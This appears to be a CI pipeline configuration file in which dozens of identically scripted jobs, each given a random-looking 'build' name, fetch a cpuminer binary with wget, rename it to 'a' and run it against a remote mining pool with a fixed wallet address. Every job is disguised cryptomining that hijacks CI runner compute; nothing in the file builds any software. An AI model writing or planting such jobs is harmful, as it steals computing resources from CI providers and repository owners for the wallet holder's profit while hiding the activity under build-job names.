  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_14jfgtr379:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_21fgyt20:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hfdtygfe:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hdskhgt:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_gahgkhgudg:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_gdhgkhgus:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_afdhkguygs:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_yjlkhguy5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_ljkhguyty6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_lkhggyutyj7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_8lkhgytuy:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_lukhgyty9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tkkfgytti0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjgjgfyttf1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjgfytgf2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1tjfgjjktg3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gjfgjhgfjtr4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1jgytjfgyt5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1hgyytjj6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gdrjtseg7:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gdgjfjgfse8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_1gfghfgdyds9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2grgfe0:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2gsgfjbvna1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fgagv2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2fgkfa3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2djgftkfgy4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_2sfgjfggfjgfjt5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtgjthjfdtgfj1:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtfdtyjfgjjfdgf2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_krtfdjfytjhgjdtfd3:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_rtjgjgfjrthjfgjfjk4:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_rtjghtyjgfjjdjfdfj5:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtjfjytjfgjfdtg6:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_7gffdfjjgjfg:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_jrtjjttjgfjgf8:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_fhhrehfdytjghhj9:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_10jfrehfytjgjdte:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_hrgfdhfgjgffdhfdf11:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js

build_j1jhfdyr2:
  stage: build
  script:
     - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
     - tar xf cpuminer-opt-linux.tar.gz
     - mv cpuminer-sse2 a
     - ./a -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:17042 -u sugar1qn3eys9whvyf03vvv3am60zuqsvqzxs8qejv6ve.js
